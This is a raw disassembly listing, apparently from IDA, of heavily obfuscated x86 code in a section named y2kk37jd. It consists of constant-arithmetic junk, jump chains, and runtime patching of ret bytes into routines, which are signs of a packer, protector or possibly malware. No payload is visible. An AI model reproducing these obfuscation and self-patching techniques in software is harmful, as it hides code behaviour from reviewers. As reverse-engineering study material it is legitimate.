; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43DDDF:				; CODE XREF: sub_43F911:loc_43DFFEj
		add	eax, 978A5FD9h
		add	eax, ebp
		add	eax, 0D3780FEBh
		mov	eax, [eax]
		cmp	dword ptr [eax+3Ch], 0
		jz	loc_44D501
		jmp	loc_451FB1
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_43DDFE:				; CODE XREF: sub_442376-1E64j
		xchg	esi, [esp+0]
		mov	edi, esi
		pop	esi
		or	edi, 5FBE55EFh
		and	edi, 0C40C2F17h
		xor	edi, 8984ECC9h
		rol	edi, 14h
		add	edi, 4360C3DCh
		jmp	loc_44A3E2
; END OF FUNCTION CHUNK	FOR sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_43DE24:				; CODE XREF: sub_454C24-14DFj
		jnz	loc_43CEBB
		jmp	loc_4586E4
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------
		push	ecx
		jmp	sub_450489
; ---------------------------------------------------------------------------

loc_43DE35:				; CODE XREF: y2kk37jd:0043D462j
		jnz	loc_458761
		xchg	ecx, ebp
		jmp	loc_4454F0
; ---------------------------------------------------------------------------

loc_43DE42:				; CODE XREF: y2kk37jd:00455BD2j
		xchg	esi, [esp]
		mov	ebp, esi
		pop	esi
		jmp	sub_44E5E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459672

loc_43DE4D:				; CODE XREF: sub_459672-16548j
		ror	ebx, 8
		jmp	loc_44582B
; END OF FUNCTION CHUNK	FOR sub_459672
; ---------------------------------------------------------------------------

loc_43DE55:				; CODE XREF: y2kk37jd:0043BCCAj
		jz	loc_443F8C
; START	OF FUNCTION CHUNK FOR sub_45A865

loc_43DE5B:				; CODE XREF: sub_45A865+7j
		jmp	loc_4413FC
; END OF FUNCTION CHUNK	FOR sub_45A865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_43DE60:				; CODE XREF: sub_44EE3D+8B06j
		jmp	loc_44BC94
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B489

loc_43DE65:				; CODE XREF: sub_44B489+3DB3j
		jmp	loc_456478
; END OF FUNCTION CHUNK	FOR sub_44B489
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C224

loc_43DE6A:				; CODE XREF: sub_44C224-3288j
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44C224
; ---------------------------------------------------------------------------
		not	ebp
		jmp	loc_443F85
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43DE77:				; CODE XREF: sub_43BD0D+161B7j
		jmp	loc_450450
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455677

loc_43DE7C:				; CODE XREF: sub_455677:loc_44F16Cj
		jmp	sub_4577FE
; END OF FUNCTION CHUNK	FOR sub_455677
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B0D0

loc_43DE81:				; CODE XREF: sub_44B0D0-7CD7j
		jmp	loc_452778
; END OF FUNCTION CHUNK	FOR sub_44B0D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_43DE86:				; CODE XREF: sub_44C304-EE6Fj
		jmp	loc_45318B
; END OF FUNCTION CHUNK	FOR sub_44C304

; =============== S U B	R O U T	I N E =======================================



sub_43DE8B	proc near		; CODE XREF: sub_4504BC-FF3Cj
					; sub_445557:loc_44C25Bp

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043EB9E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004407CB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441049 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00441B96 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E8C0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045356D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455FEA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457C12 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00457E93 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045A31A SIZE 0000000A BYTES

		jnz	loc_45B7F6
		push	ebp
		mov	ebp, esp
		push	esi
		push	ecx
		jmp	loc_441049
sub_43DE8B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C0

loc_43DE9B:				; CODE XREF: sub_4545C0:loc_43C6A4j
		push	offset loc_458D40
		jmp	loc_452C07
; END OF FUNCTION CHUNK	FOR sub_4545C0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DEA6:				; CODE XREF: y2kk37jd:0044640Aj
		jmp	loc_43B780
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43DEAB:				; CODE XREF: sub_451A35:loc_455BE4j
		sub	ecx, 988BDDD0h
		and	edi, 4EA468E0h
		shr	ecx, 2
		mov	[ebx], edi
		jmp	sub_455C55
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------

loc_43DEC1:				; CODE XREF: y2kk37jd:0043B123j
		jz	loc_456A22

loc_43DEC7:				; CODE XREF: y2kk37jd:0044A87Cj
		jmp	loc_4414D6
; ---------------------------------------------------------------------------
		sbb	eax, edx
		jb	loc_4549A1
		jmp	loc_456A22
; ---------------------------------------------------------------------------

locret_43DED9:				; CODE XREF: y2kk37jd:0043D92Cj
		retn
; ---------------------------------------------------------------------------

loc_43DEDA:				; CODE XREF: y2kk37jd:00452745j
		push	0EACBAC1Fh

loc_43DEDF:				; CODE XREF: y2kk37jd:loc_45273Cj
		add	ebx, 5372440Fh
		rol	ebx, 1Fh
		add	ebx, 3AC6B250h
		call	sub_4566A8
; START	OF FUNCTION CHUNK FOR sub_45AD8D

loc_43DEF3:				; CODE XREF: sub_45AD8D+Cj
		jmp	loc_43CC90
; END OF FUNCTION CHUNK	FOR sub_45AD8D
; ---------------------------------------------------------------------------

loc_43DEF8:				; CODE XREF: y2kk37jd:00443518j
		jmp	locret_44EE89
; ---------------------------------------------------------------------------

loc_43DEFD:				; CODE XREF: y2kk37jd:00449237j
		mov	edx, 0A22F8A70h
		call	sub_44FBFB
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_43DF07:				; CODE XREF: sub_454D0F-DD6Aj
		jmp	loc_445818
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C7B9

loc_43DF0C:				; CODE XREF: sub_43C7B9+1E2Cj
		jmp	loc_440A24
; END OF FUNCTION CHUNK	FOR sub_43C7B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_221. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DF12:				; CODE XREF: y2kk37jd:00448A8Dj
		jmp	locret_43E91A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AFC4

loc_43DF17:				; CODE XREF: sub_45AFC4:loc_45AF99j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44B22E
; END OF FUNCTION CHUNK	FOR sub_45AFC4

; =============== S U B	R O U T	I N E =======================================



sub_43DF1F	proc near		; CODE XREF: sub_4033CB+BEp
					; sub_404C4E+D9p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E3C3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F51B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440C94 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440E16 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044431C SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004509D4 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045175E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00455FB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E7E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B26A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045B4A6 SIZE 00000025 BYTES

		push	eax
		push	43919F81h
		pop	eax
		jmp	loc_43E3C3
sub_43DF1F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_43DF2B:				; CODE XREF: sub_43BD0D:loc_4467C5j
		push	0C78E186Ah
		not	edi
		mov	eax, [ebx]
		test	eax, edx
		jmp	loc_44B44E
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		and	ebx, edx
		jmp	sub_44001E
; ---------------------------------------------------------------------------
		shl	eax, 0Ah
		jmp	sub_441518
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_419. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DF4B:				; CODE XREF: y2kk37jd:0045A2BAj
		jmp	loc_450684
; ---------------------------------------------------------------------------
		jl	loc_444356
		jmp	sub_43C3F1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43DF5B:				; CODE XREF: sub_43F8B8:loc_43BC2Aj
					; sub_453867:loc_443A0Cj ...
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_443522
		jmp	loc_43E78F
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45833C

loc_43DF6C:				; CODE XREF: sub_45833C:loc_44D2D2j
		jz	loc_44FC3B
		jmp	loc_43EABB
; END OF FUNCTION CHUNK	FOR sub_45833C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43DF77:				; CODE XREF: sub_43ED19-B51j
		xor	edi, 918AAF9Fh
		xor	esi, edx
		adc	edi, 0AD8DEE4Ch
		jmp	loc_454607
; END OF FUNCTION CHUNK	FOR sub_43ED19

; =============== S U B	R O U T	I N E =======================================



sub_43DF8A	proc near		; CODE XREF: y2kk37jd:0043B8EEj
					; sub_446FF7+1p

; FUNCTION CHUNK AT 00454D0A SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	7EC39D75h
		pop	edi
		jmp	loc_454D0A
sub_43DF8A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_43DF99:				; CODE XREF: sub_43BD3D+1C125j
		jle	loc_43D227
		add	edi, 636C9C56h
		and	ecx, 537B2197h

loc_43DFAB:				; CODE XREF: sub_43BD3D:loc_457E56j
		sub	edx, 2131B52Dh
		jmp	loc_458230
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------

loc_43DFB6:				; CODE XREF: y2kk37jd:0044D498j
		xor	eax, 0E6B65192h
		or	eax, ds:4000EBh
		test	eax, 1
		jmp	loc_4442A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_43DFCD:				; CODE XREF: sub_455E0B-43BDj
		xchg	edx, eax

loc_43DFCF:				; CODE XREF: sub_455E0B:loc_44CE32j
		pop	ecx
		call	sub_453BF3

loc_43DFD5:				; CODE XREF: sub_43C06A+175B4j
		jmp	sub_453B0B
; END OF FUNCTION CHUNK	FOR sub_455E0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504DD

loc_43DFDA:				; CODE XREF: sub_4504DD+Fj
		jmp	loc_449107
; END OF FUNCTION CHUNK	FOR sub_4504DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_43DFDF:				; CODE XREF: sub_45B7AA-1EA1Fj
		jmp	sub_448C11
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
		jnp	loc_44972B
		jmp	sub_43CE38
; ---------------------------------------------------------------------------
		rol	ebx, 0Fh
		jmp	sub_447F82
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B8D6

loc_43DFF7:				; CODE XREF: sub_43B8D6+BD98j
		cmp	edx, eax
		jmp	loc_43FC0A
; END OF FUNCTION CHUNK	FOR sub_43B8D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_43DFFE:				; CODE XREF: sub_43F911:loc_43DB5Cj
		jz	loc_43DDDF

loc_43E004:				; CODE XREF: sub_4505A1+14j
		jmp	loc_44CBB9
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E009:				; CODE XREF: sub_445226+3B52j
		jmp	loc_43F96B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43E00E:				; CODE XREF: y2kk37jd:00440BACj
		jmp	loc_44E762
; ---------------------------------------------------------------------------
		cmp	ebp, eax
		jmp	loc_43DDD8
; ---------------------------------------------------------------------------

loc_43E01A:				; CODE XREF: y2kk37jd:00459F69j
		pop	eax
		xor	eax, 0FD6066B7h
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_43E021:				; CODE XREF: sub_44AAA1:loc_452DFAj
		add	eax, 0EA95A2B7h
		rol	eax, 1Ch
		xor	eax, 9F81CA41h
		push	edi
		pushf
		push	0E91EA70Dh
		jmp	loc_4465D7
; END OF FUNCTION CHUNK	FOR sub_44AAA1

; =============== S U B	R O U T	I N E =======================================



sub_43E03C	proc near		; CODE XREF: sub_455A2Dj
					; DATA XREF: sub_4578A6-1E83o

; FUNCTION CHUNK AT 0043F2B7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C667 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F09B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004598CC SIZE 00000005 BYTES

		cmp	al, 0A4h
		jz	loc_43CBAC
		jmp	loc_44C667
sub_43E03C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43E049	proc near		; DATA XREF: sub_445226+12AC0o

; FUNCTION CHUNK AT 0043CFC8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044224F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442C32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443F54 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445D3B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004468FA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447CB7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00450269 SIZE 00000017 BYTES

		add	ebx, 455A4A62h
		add	eax, ebx
		pop	ebx
		mov	eax, [eax]
		push	ecx
		mov	ecx, eax
		jmp	loc_443F54
sub_43E049	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_43E05C:				; CODE XREF: sub_43F8B8+17DFEj
		pop	ebx
		and	ecx, 2A166294h
		sub	eax, 3758B323h
		call	nullsub_3
		retn
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
		db  56h	; V
		db  68h	; h
		db  3Dh	; =
		db 0E3h	; 
		db 0B2h	; 
		db 0FBh	; 
		db 0E9h	; 
		db 0E4h	; 
		db 0EDh	; 
		db 0FFh
		db 0FFh

; =============== S U B	R O U T	I N E =======================================



sub_43E07B	proc near		; CODE XREF: y2kk37jd:0044F847p
					; y2kk37jd:0045A746j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C953 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E20E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043FC83 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044405C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B433 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044CC8E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044D6E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC23 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458318 SIZE 00000024 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		jmp	loc_44D6E9
sub_43E07B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B765

loc_43E08A:				; CODE XREF: sub_43B765+11B39j
		cdq
		cmp	edi, ecx
		jmp	loc_452CC2
; END OF FUNCTION CHUNK	FOR sub_43B765
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445568

loc_43E092:				; CODE XREF: sub_445568+896Cj
		jz	loc_443E9B
		test	ebx, ecx
		jmp	loc_454C9A
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF1D

loc_43E09F:				; CODE XREF: sub_44DF1D-4FF7j
		push	edx
		push	0B01A75F0h
		or	edx, 0E0DC1EE4h
		jmp	loc_442428
; END OF FUNCTION CHUNK	FOR sub_44DF1D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E9

loc_43E0B0:				; CODE XREF: sub_4554E9:loc_4560D8j
		pop	edx
		pop	ebp
		jmp	loc_45608B
; END OF FUNCTION CHUNK	FOR sub_4554E9
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		jmp	loc_44A85A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451515

loc_43E0BF:				; CODE XREF: sub_451515+10j
		pop	ebx
		jmp	loc_45B898
; END OF FUNCTION CHUNK	FOR sub_451515
; ---------------------------------------------------------------------------

loc_43E0C5:				; CODE XREF: y2kk37jd:loc_45C2FAj
		ror	ebx, 7
		mov	eax, 0E6AA7108h
		cmp	ecx, 90EB9B9Fh
		jmp	loc_443D94
; ---------------------------------------------------------------------------

loc_43E0D8:				; CODE XREF: y2kk37jd:00448638j
		jbe	loc_459B97

; =============== S U B	R O U T	I N E =======================================



sub_43E0DE	proc near		; CODE XREF: y2kk37jd:loc_43B861p

; FUNCTION CHUNK AT 004477C5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C953 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E038 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E61E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004559C5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00455CAB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045ABA3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B6CD SIZE 0000000C BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, 5BDBE37Eh
		jmp	loc_44C953
sub_43E0DE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43E0ED:				; CODE XREF: y2kk37jd:004462DBj
		adc	eax, 0D332CB48h

; =============== S U B	R O U T	I N E =======================================



sub_43E0F3	proc near		; CODE XREF: y2kk37jd:loc_43DC41p
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_442C3E
		mov	ds:off_41E084, eax
		lea	eax, sub_43D005
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D005
sub_43E0F3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43E110	proc near		; CODE XREF: sub_40A074+194p
					; sub_40D41A+212p ...

; FUNCTION CHUNK AT 0044F631 SIZE 00000006 BYTES

		call	sub_44F641
		jmp	loc_44F631
sub_43E110	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E11A:				; CODE XREF: sub_445226+10561j
		mov	ecx, ebp
		mov	edi, 0BAEE168Eh
		sbb	ebp, esi

loc_43E123:				; CODE XREF: sub_445226+10553j
		sub	ecx, 23CC9AA5h
		jmp	loc_456D2E
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		mov	ds:off_41E074, eax
		lea	eax, sub_43D5FE
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D5FE
; ---------------------------------------------------------------------------

loc_43E142:				; CODE XREF: y2kk37jd:004455F8j
		mov	eax, [esp]
		push	edx
		jmp	loc_44D268
; ---------------------------------------------------------------------------
		jnp	loc_43EC5B
		sub	ebx, ebp
		jmp	loc_447367
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_43E158:				; CODE XREF: sub_445226:loc_4452ACj
		pop	ecx
		xor	ebx, 0EF980B6Dh

loc_43E15F:				; CODE XREF: sub_449E69+EB2Cj
		sub	ebx, 6CDB1D0Bh
		rol	ebx, 1
		jmp	loc_44A3DD
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_43E16C:				; CODE XREF: y2kk37jd:004492F2j
		test	edi, edx
		jmp	loc_43C467
; ---------------------------------------------------------------------------

loc_43E173:				; DATA XREF: sub_44B8EE+7o
		cmp	dword ptr [eax-1Ch], 0F6h
		jz	loc_45B386
		push	offset loc_43FB8F
		jmp	loc_43F5E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_43E18A:				; CODE XREF: sub_44BD20:loc_458471j
		push	ecx
		mov	ecx, edx
		call	sub_446718

loc_43E192:				; CODE XREF: y2kk37jd:0044579Fj
		jmp	loc_43D899
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A3

loc_43E197:				; CODE XREF: sub_4554A3-F29Cj
		pushf
		jmp	loc_43C576
; END OF FUNCTION CHUNK	FOR sub_4554A3
; ---------------------------------------------------------------------------

loc_43E19D:				; CODE XREF: y2kk37jd:00458B34j
		xor	esi, 64D5FE0Eh
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_43E1A3:				; CODE XREF: sub_44D3D0:loc_458B17j
		push	offset loc_43B08F
		jmp	loc_44DF3B
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_43E1AD:				; CODE XREF: sub_451A35:loc_44D1B5j
					; y2kk37jd:0044D1CFj
		add	eax, 75270348h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_445A51
		jmp	loc_43BBC4
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED19

loc_43E1C2:				; CODE XREF: sub_43ED19:loc_4464DAj
		jz	loc_454608
		jmp	loc_43DF77
; END OF FUNCTION CHUNK	FOR sub_43ED19
; ---------------------------------------------------------------------------

loc_43E1CD:				; DATA XREF: sub_445C40:loc_452F03o
		mov	byte ptr [eax],	0C3h
		jmp	sub_445C40
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445C40

loc_43E1D5:				; CODE XREF: sub_445C40j
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+0]
		jmp	loc_456080
; END OF FUNCTION CHUNK	FOR sub_445C40

; =============== S U B	R O U T	I N E =======================================



sub_43E1E9	proc near		; DATA XREF: sub_458FCE-10D03o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004412B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441445 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443C3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444615 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00444B09 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448DBE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D180 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D51A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454D51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045969E SIZE 00000015 BYTES

		add	edx, 2C0FF4CAh
		mov	edx, [edx]
		call	sub_44346B

loc_43E1F6:				; CODE XREF: sub_44B8FF+67C4j
		jmp	loc_4506F7
sub_43E1E9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43E1FB:				; CODE XREF: y2kk37jd:loc_44C6F9j
		push	offset sub_45AC5C
		jmp	loc_4525E2
; ---------------------------------------------------------------------------
		and	eax, ecx
		jmp	sub_443DE1
; ---------------------------------------------------------------------------

loc_43E20C:				; CODE XREF: y2kk37jd:0044CCB0j
		or	ecx, eax
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_43E20E:				; CODE XREF: sub_43E07B+EC1Fj
		or	esi, 0CAE3FB9Ah
		add	esi, 144420Ah
		xchg	esi, [esp+0]
		jmp	loc_43C953
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_43E222:				; CODE XREF: sub_44EE3D:loc_4564B9j
		mov	esi, ecx
		xchg	esi, [esp+8+var_8]
		mov	esp, ebp
		pop	ebp
		jmp	loc_4470BC
; END OF FUNCTION CHUNK	FOR sub_44EE3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_43E22F:				; CODE XREF: sub_44B03F:loc_4572B2j
		push	offset loc_44A259
		jmp	nullsub_204
; END OF FUNCTION CHUNK	FOR sub_44B03F

; =============== S U B	R O U T	I N E =======================================



sub_43E239	proc near		; DATA XREF: y2kk37jd:00457736o
		mov	[esi], eax
		pop	esi
sub_43E239	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_448700

loc_43E23C:				; CODE XREF: sub_448700:loc_444FF7j
		lea	eax, sub_45C5C5
		mov	byte ptr [eax],	0C3h
		jmp	loc_459EA0
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458834

loc_43E24A:				; CODE XREF: sub_458834+1j
		push	offset loc_44DE58

loc_43E24F:				; CODE XREF: sub_442F9C:loc_45A6BFj
		jmp	nullsub_436
; END OF FUNCTION CHUNK	FOR sub_458834
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_409. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_43E255:				; CODE XREF: sub_442829+13A28j
		jmp	loc_451D19
; END OF FUNCTION CHUNK	FOR sub_442829

; =============== S U B	R O U T	I N E =======================================



sub_43E25A	proc near		; CODE XREF: sub_44803E+4p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441A26 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00442FF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AAF8 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045289D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456938 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045728F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A7A5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C363 SIZE 0000001A BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+4+var_4]
		jmp	loc_45A7A5
sub_43E25A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B924

loc_43E265:				; CODE XREF: sub_44B924:loc_443C38j
		mov	eax, [eax]
		jmp	loc_44FAE8
; ---------------------------------------------------------------------------

loc_43E26C:				; CODE XREF: sub_44B924:loc_43B645j
		mov	eax, [ebp-4]
		call	sub_444DF4
		test	al, al
		jnz	loc_456D49
		jmp	loc_45C3E3
; END OF FUNCTION CHUNK	FOR sub_44B924
; ---------------------------------------------------------------------------
		mov	ds:dword_41E068, eax
		lea	eax, nullsub_482
		mov	byte ptr [eax],	0C3h
		jmp	loc_4597A9
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edx
		call	sub_449775
		mov	eax, 1F1D4A60h
		jmp	loc_459892
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EC0A

loc_43E2A9:				; CODE XREF: sub_43EC0A+15j
		xor	esi, 0B47E1A54h
		sub	esi, 288DFCFFh
		xor	esi, 4A1EAA1Dh
		add	esi, 0E5174A5h
		mov	[esi], eax
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_43EC0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_43E2C5:				; CODE XREF: sub_453867:loc_443A6Aj
		xchg	esi, eax
		js	loc_454A7F
		jmp	loc_451879
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_43E2D2	proc near		; CODE XREF: sub_4590D6-DA2Dp
					; y2kk37jd:00456096j

; FUNCTION CHUNK AT 00443045 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DEBA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452656 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454274 SIZE 00000005 BYTES
